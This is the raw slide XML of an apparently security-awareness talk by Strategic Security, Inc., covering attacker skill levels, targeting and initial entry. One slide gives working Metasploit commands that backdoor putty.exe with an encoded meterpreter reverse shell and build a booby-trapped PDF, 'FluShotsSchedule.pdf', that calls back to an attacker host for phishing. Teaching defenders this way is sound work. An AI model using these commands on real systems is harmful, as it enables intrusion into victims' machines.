              <a:t>Kiddie</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>Level 2:	Got some game</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>Level 3:	Organized crime/hacker for hire</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>Level 4:	State sponsored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r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>1				2		3		4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648200"/>
            <a:ext cx="15430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72440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724400"/>
            <a:ext cx="2209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724400"/>
            <a:ext cx="23241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2296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Phase 1: Targeting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83820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en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>Determine who has what I want</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="800" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" eaLnBrk="1" hangingPunct="1">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US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5510212" cy="483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796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eader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ooter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639445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808080"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Strategic Security, Inc. ©                http://www.strategicsec.com/</a:t>
            </a:r>
            <a:endParaRPr lang="es-ES" sz="1200">
              <a:solidFill>
                <a:srgbClr val="808080"/>
              </a:solidFill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43000" y="1295400"/>
            <a:ext cx="7026275" cy="1895475"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="0" tIns="0" rIns="0" bIns="0" anchor="t"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>
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>How I Throw Down...(j0e)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8600" y="2514600"/>
            <a:ext cx="8458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 smtClean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r>
              <a:rPr lang="en-GB" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="4D4D4D"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a: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sz="1600" dirty="0">
              <a:solidFill>
                <a:srgbClr val="4D4D4D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2209800"/>
            <a:ext cx="8686800" cy="426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557213" indent="-55721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buFont typeface="Arial" charset="0"/>
              <a:buChar char="•"/>
              <a:tabLst>
                <a:tab pos="557213" algn="l"/>
                <a:tab pos="1014413" algn="l"/>
                <a:tab pos="1471613" algn="l"/>
                <a:tab pos="1928813" algn="l"/>
                <a:tab pos="2386013" algn="l"/>
                <a:tab pos="2843213" algn="l"/>
                <a:tab pos="3300413" algn="l"/>
                <a:tab pos="3757613" algn="l"/>
                <a:tab pos="4214813" algn="l"/>
                <a:tab pos="4672013" algn="l"/>
                <a:tab pos="5129213" algn="l"/>
                <a:tab pos="5586413" algn="l"/>
                <a:tab pos="6043613" algn="l"/>
                <a:tab pos="6500813" algn="l"/>
                <a:tab pos="6958013" algn="l"/>
                <a:tab pos="7415213" algn="l"/>
                <a:tab pos="7872413" algn="l"/>
                <a:tab pos="8329613" algn="l"/>
                <a:tab pos="8786813" algn="l"/>
                <a:tab pos="9244013" algn="l"/>
                <a:tab pos="9701213" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="3600" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="4D4D4D"/>
                </a:solidFill>
              </a:rPr>
              <a:t>I HACK</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="557213" indent="-55721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buFont typeface="Arial" charset="0"/>
              <a:buChar char="•"/>
              <a:tabLst>
                <a:tab pos="557213" algn="l"/>
                <a:tab pos="1014413" algn="l"/>
                <a:tab pos="1471613" algn="l"/>
                <a:tab pos="1928813" algn="l"/>
                <a:tab pos="2386013" algn="l"/>
                <a:tab pos="2843213" algn="l"/>
                <a:tab pos="3300413" algn="l"/>
                <a:tab pos="3757613" algn="l"/>
                <a:tab pos="4214813" algn="l"/>
                <a:tab pos="4672013" algn="l"/>
                <a:tab pos="5129213" algn="l"/>
                <a:tab pos="5586413" algn="l"/>
                <a:tab pos="6043613" algn="l"/>
                <a:tab pos="6500813" algn="l"/>
                <a:tab pos="6958013" algn="l"/>
                <a:tab pos="7415213" algn="l"/>
                <a:tab pos="7872413" algn="l"/>
                <a:tab pos="8329613" algn="l"/>
                <a:tab pos="8786813" algn="l"/>
                <a:tab pos="9244013" algn="l"/>
                <a:tab pos="9701213" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:endParaRPr lang="en-GB" sz="3600" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="4D4D4D"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="557213" indent="-55721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buFont typeface="Arial" charset="0"/>
              <a:buChar char="•"/>
              <a:tabLst>
                <a:tab pos="557213" algn="l"/>
                <a:tab pos="1014413" algn="l"/>
                <a:tab pos="1471613" algn="l"/>
                <a:tab pos="1928813" algn="l"/>
                <a:tab pos="2386013" algn="l"/>
                <a:tab pos="2843213" algn="l"/>
                <a:tab pos="3300413" algn="l"/>
                <a:tab pos="3757613" algn="l"/>
                <a:tab pos="4214813" algn="l"/>
                <a:tab pos="4672013" algn="l"/>
                <a:tab pos="5129213" algn="l"/>
                <a:tab pos="5586413" algn="l"/>
                <a:tab pos="6043613" algn="l"/>
                <a:tab pos="6500813" algn="l"/>
                <a:tab pos="6958013" algn="l"/>
                <a:tab pos="7415213" algn="l"/>
                <a:tab pos="7872413" algn="l"/>
                <a:tab pos="8329613" algn="l"/>
                <a:tab pos="8786813" algn="l"/>
                <a:tab pos="9244013" algn="l"/>
                <a:tab pos="9701213" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="3600" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="4D4D4D"/>
                </a:solidFill>
              </a:rPr>
              <a:t>I CURSE</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="557213" indent="-55721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buFont typeface="Arial" charset="0"/>
              <a:buChar char="•"/>
              <a:tabLst>
                <a:tab pos="557213" algn="l"/>
                <a:tab pos="1014413" algn="l"/>
                <a:tab pos="1471613" algn="l"/>
                <a:tab pos="1928813" algn="l"/>
                <a:tab pos="2386013" algn="l"/>
                <a:tab pos="2843213" algn="l"/>
                <a:tab pos="3300413" algn="l"/>
                <a:tab pos="3757613" algn="l"/>
                <a:tab pos="4214813" algn="l"/>
                <a:tab pos="4672013" algn="l"/>
                <a:tab pos="5129213" algn="l"/>
                <a:tab pos="5586413" algn="l"/>
                <a:tab pos="6043613" algn="l"/>
                <a:tab pos="6500813" algn="l"/>
                <a:tab pos="6958013" algn="l"/>
                <a:tab pos="7415213" algn="l"/>
                <a:tab pos="7872413" algn="l"/>
                <a:tab pos="8329613" algn="l"/>
                <a:tab pos="8786813" algn="l"/>
                <a:tab pos="9244013" algn="l"/>
                <a:tab pos="9701213" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:endParaRPr lang="en-GB" sz="3600" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="4D4D4D"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="557213" indent="-55721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buFont typeface="Arial" charset="0"/>
              <a:buChar char="•"/>
              <a:tabLst>
                <a:tab pos="557213" algn="l"/>
                <a:tab pos="1014413" algn="l"/>
                <a:tab pos="1471613" algn="l"/>
                <a:tab pos="1928813" algn="l"/>
                <a:tab pos="2386013" algn="l"/>
                <a:tab pos="2843213" algn="l"/>
                <a:tab pos="3300413" algn="l"/>
                <a:tab pos="3757613" algn="l"/>
                <a:tab pos="4214813" algn="l"/>
                <a:tab pos="4672013" algn="l"/>
                <a:tab pos="5129213" algn="l"/>
                <a:tab pos="5586413" algn="l"/>
                <a:tab pos="6043613" algn="l"/>
                <a:tab pos="6500813" algn="l"/>
                <a:tab pos="6958013" algn="l"/>
                <a:tab pos="7415213" algn="l"/>
                <a:tab pos="7872413" algn="l"/>
                <a:tab pos="8329613" algn="l"/>
                <a:tab pos="8786813" algn="l"/>
                <a:tab pos="9244013" algn="l"/>
                <a:tab pos="9701213" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="3600" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="4D4D4D"/>
                </a:solidFill>
              </a:rPr>
              <a:t>I DRINK (Rum &amp; Coke)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="557213" indent="-55721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buFont typeface="Arial" charset="0"/>
              <a:buChar char="•"/>
              <a:tabLst>
                <a:tab pos="557213" algn="l"/>
                <a:tab pos="1014413" algn="l"/>
                <a:tab pos="1471613" algn="l"/>
                <a:tab pos="1928813" algn="l"/>
                <a:tab pos="2386013" algn="l"/>
                <a:tab pos="2843213" algn="l"/>
                <a:tab pos="3300413" algn="l"/>
                <a:tab pos="3757613" algn="l"/>
                <a:tab pos="4214813" algn="l"/>
                <a:tab pos="4672013" algn="l"/>
                <a:tab pos="5129213" algn="l"/>
                <a:tab pos="5586413" algn="l"/>
                <a:tab pos="6043613" algn="l"/>
                <a:tab pos="6500813" algn="l"/>
                <a:tab pos="6958013" algn="l"/>
                <a:tab pos="7415213" algn="l"/>
                <a:tab pos="7872413" algn="l"/>
                <a:tab pos="8329613" algn="l"/>
                <a:tab pos="8786813" algn="l"/>
                <a:tab pos="9244013" algn="l"/>
                <a:tab pos="9701213" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:endParaRPr lang="en-GB" sz="3600" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="4D4D4D"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="557213" indent="-55721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57213" algn="l"/>
                <a:tab pos="1014413" algn="l"/>
                <a:tab pos="1471613" algn="l"/>
                <a:tab pos="1928813" algn="l"/>
                <a:tab pos="2386013" algn="l"/>
                <a:tab pos="2843213" algn="l"/>
                <a:tab pos="3300413" algn="l"/>
                <a:tab pos="3757613" algn="l"/>
                <a:tab pos="4214813" algn="l"/>
                <a:tab pos="4672013" algn="l"/>
                <a:tab pos="5129213" algn="l"/>
                <a:tab pos="5586413" algn="l"/>
                <a:tab pos="6043613" algn="l"/>
                <a:tab pos="6500813" algn="l"/>
                <a:tab pos="6958013" algn="l"/>
                <a:tab pos="7415213" algn="l"/>
                <a:tab pos="7872413" algn="l"/>
                <a:tab pos="8329613" algn="l"/>
                <a:tab pos="8786813" algn="l"/>
                <a:tab pos="9244013" algn="l"/>
                <a:tab pos="9701213" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:endParaRPr lang="en-GB" sz="3600" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="4D4D4D"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="557213" indent="-55721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57213" algn="l"/>
                <a:tab pos="1014413" algn="l"/>
                <a:tab pos="1471613" algn="l"/>
                <a:tab pos="1928813" algn="l"/>
                <a:tab pos="2386013" algn="l"/>
                <a:tab pos="2843213" algn="l"/>
                <a:tab pos="3300413" algn="l"/>
                <a:tab pos="3757613" algn="l"/>
                <a:tab pos="4214813" algn="l"/>
                <a:tab pos="4672013" algn="l"/>
                <a:tab pos="5129213" algn="l"/>
                <a:tab pos="5586413" algn="l"/>
                <a:tab pos="6043613" algn="l"/>
                <a:tab pos="6500813" algn="l"/>
                <a:tab pos="6958013" algn="l"/>
                <a:tab pos="7415213" algn="l"/>
                <a:tab pos="7872413" algn="l"/>
                <a:tab pos="8329613" algn="l"/>
                <a:tab pos="8786813" algn="l"/>
                <a:tab pos="9244013" algn="l"/>
                <a:tab pos="9701213" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:endParaRPr lang="en-GB" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="4D4D4D"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="557213" indent="-55721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57213" algn="l"/>
                <a:tab pos="1014413" algn="l"/>
                <a:tab pos="1471613" algn="l"/>
                <a:tab pos="1928813" algn="l"/>
                <a:tab pos="2386013" algn="l"/>
                <a:tab pos="2843213" algn="l"/>
                <a:tab pos="3300413" algn="l"/>
                <a:tab pos="3757613" algn="l"/>
                <a:tab pos="4214813" algn="l"/>
                <a:tab pos="4672013" algn="l"/>
                <a:tab pos="5129213" algn="l"/>
                <a:tab pos="5586413" algn="l"/>
                <a:tab pos="6043613" algn="l"/>
                <a:tab pos="6500813" algn="l"/>
                <a:tab pos="6958013" algn="l"/>
                <a:tab pos="7415213" algn="l"/>
                <a:tab pos="7872413" algn="l"/>
                <a:tab pos="8329613" algn="l"/>
                <a:tab pos="8786813" algn="l"/>
                <a:tab pos="9244013" algn="l"/>
                <a:tab pos="9701213" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:endParaRPr lang="en-GB" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="4D4D4D"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="557213" indent="-55721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57213" algn="l"/>
                <a:tab pos="1014413" algn="l"/>
                <a:tab pos="1471613" algn="l"/>
                <a:tab pos="1928813" algn="l"/>
                <a:tab pos="2386013" algn="l"/>
                <a:tab pos="2843213" algn="l"/>
                <a:tab pos="3300413" algn="l"/>
                <a:tab pos="3757613" algn="l"/>
                <a:tab pos="4214813" algn="l"/>
                <a:tab pos="4672013" algn="l"/>
                <a:tab pos="5129213" algn="l"/>
                <a:tab pos="5586413" algn="l"/>
                <a:tab pos="6043613" algn="l"/>
                <a:tab pos="6500813" algn="l"/>
                <a:tab pos="6958013" algn="l"/>
                <a:tab pos="7415213" algn="l"/>
                <a:tab pos="7872413" algn="l"/>
                <a:tab pos="8329613" algn="l"/>
                <a:tab pos="8786813" algn="l"/>
                <a:tab pos="9244013" algn="l"/>
                <a:tab pos="9701213" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:endParaRPr lang="en-GB" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="4D4D4D"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="557213" indent="-55721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57213" algn="l"/>
                <a:tab pos="1014413" algn="l"/>
                <a:tab pos="1471613" algn="l"/>
                <a:tab pos="1928813" algn="l"/>
                <a:tab pos="2386013" algn="l"/>
                <a:tab pos="2843213" algn="l"/>
                <a:tab pos="3300413" algn="l"/>
                <a:tab pos="3757613" algn="l"/>
                <a:tab pos="4214813" algn="l"/>
                <a:tab pos="4672013" algn="l"/>
                <a:tab pos="5129213" algn="l"/>
                <a:tab pos="5586413" algn="l"/>
                <a:tab pos="6043613" algn="l"/>
                <a:tab pos="6500813" algn="l"/>
                <a:tab pos="6958013" algn="l"/>
                <a:tab pos="7415213" algn="l"/>
                <a:tab pos="7872413" algn="l"/>
                <a:tab pos="8329613" algn="l"/>
                <a:tab pos="8786813" algn="l"/>
                <a:tab pos="9244013" algn="l"/>
                <a:tab pos="9701213" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:endParaRPr lang="en-GB" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="4D4D4D"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="557213" indent="-557213">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="800"/>
              </a:spcBef>
              <a:tabLst>
                <a:tab pos="557213" algn="l"/>
                <a:tab pos="1014413" algn="l"/>
                <a:tab pos="1471613" algn="l"/>
                <a:tab pos="1928813" algn="l"/>
                <a:tab pos="2386013" algn="l"/>
                <a:tab pos="2843213" algn="l"/>
                <a:tab pos="3300413" algn="l"/>
                <a:tab pos="3757613" algn="l"/>
                <a:tab pos="4214813" algn="l"/>
                <a:tab pos="4672013" algn="l"/>
                <a:tab pos="5129213" algn="l"/>
                <a:tab pos="5586413" algn="l"/>
                <a:tab pos="6043613" algn="l"/>
                <a:tab pos="6500813" algn="l"/>
                <a:tab pos="6958013" algn="l"/>
                <a:tab pos="7415213" algn="l"/>
                <a:tab pos="7872413" algn="l"/>
                <a:tab pos="8329613" algn="l"/>
                <a:tab pos="8786813" algn="l"/>
                <a:tab pos="9244013" algn="l"/>
                <a:tab pos="9701213" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:endParaRPr lang="en-GB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1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2296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Phase 1: Targeting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19100" y="1295400"/>
            <a:ext cx="83820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en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>Determine who has what I want</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="800" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" eaLnBrk="1" hangingPunct="1">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Picture 2" descr="ng-i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73185"/>
            <a:ext cx="6781800" cy="508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19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2296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Phase 1: Targeting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19100" y="1295400"/>
            <a:ext cx="83820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en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>Determine who has access to it</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="800" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" eaLnBrk="1" hangingPunct="1">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="Picture 1" descr="linkedi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808805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63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2296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Phase 1: Targeting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19100" y="1295400"/>
            <a:ext cx="83820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en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>Determine who has access to it</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="800" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" eaLnBrk="1" hangingPunct="1">
              <a:buNone/>
            </a:pP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8897" y="1832466"/>
            <a:ext cx="5820103" cy="454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23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2296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Phase 2: Initial Entry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83820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en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>Which of these can you detect and respond to?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="8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Client-Side Exploit (&lt;1 yr old)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Client-Side Exploit (&lt;90 days old)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Phishing for </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>credentials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File Format Exploit (malicious attachment)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User Assist/”No Exploit” Exploit (ex: Java Applet)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Custom Exploit/0day</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" eaLnBrk="1" hangingPunct="1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5265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229600" cy="99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Phase 2: Initial Entry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382000" cy="510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en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>Example Syntax:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"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Step 1: Create your own payload</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1" smtClean="0"/>
              <a:t>wget</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0"/>
              <a:t> http://the.earth.li/~sgtatham/putty/latest/x86/putty.exe</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0"/>
              <a:t>./</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1" smtClean="0"/>
              <a:t>msfpayload</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0"/>
              <a:t> windows/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1" smtClean="0"/>
              <a:t>meterpreter</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1" smtClean="0"/>
              <a:t>reverse_tcp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0"/>
              <a:t> R | </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1" smtClean="0"/>
              <a:t>msfencode</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0"/>
              <a:t> -c 5 -e x86/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1" smtClean="0"/>
              <a:t>shikata_ga_nai</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0"/>
              <a:t> -x putty.exe -t exe &gt;/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1" smtClean="0"/>
              <a:t>tmp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0"/>
              <a:t>/payload.exe</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1000" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"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Step 2: Create an evil </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>pdf</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1000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en-US" sz="1000" dirty="0" smtClean="0"/>
              <a:t>./</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1" smtClean="0"/>
              <a:t>msfconsole</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1000" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1" smtClean="0"/>
              <a:t>msf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0"/>
              <a:t> &gt; use windows/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1" smtClean="0"/>
              <a:t>fileformat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1" smtClean="0"/>
              <a:t>adobe_pdf_embedded_exe</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1000" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1" smtClean="0"/>
              <a:t>msf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0"/>
              <a:t> &gt; set PAYLOAD windows/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1" smtClean="0"/>
              <a:t>meterpreter</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1" smtClean="0"/>
              <a:t>reverse_https</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1000" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1" smtClean="0"/>
              <a:t>msf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0"/>
              <a:t> &gt; set EXENAME /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1" smtClean="0"/>
              <a:t>tmp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0"/>
              <a:t>/payload.exe</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1" smtClean="0"/>
              <a:t>msf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0"/>
              <a:t> &gt; set FILENAME FluShotsSchedule.pdf</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1" smtClean="0"/>
              <a:t>msf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0"/>
              <a:t> &gt; set INFILENAME /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1" smtClean="0"/>
              <a:t>tmp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0"/>
              <a:t>/Report.pdf</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1" smtClean="0"/>
              <a:t>msf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0"/>
              <a:t> &gt; set OUTPUTPATH /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1" smtClean="0"/>
              <a:t>tmp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0"/>
              <a:t>/</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1" smtClean="0"/>
              <a:t>msf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0"/>
              <a:t> &gt; set LHOST [your attacker </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1" smtClean="0"/>
              <a:t>ip</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0"/>
              <a:t>]</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1" smtClean="0"/>
              <a:t>msf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0"/>
              <a:t> &gt; exploit</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1000" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0"/>
              <a:t>Result: /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1" smtClean="0"/>
              <a:t>tmp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0"/>
              <a:t>/FluShotsSchedule.pdf</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"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Step 3: Send the evil </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
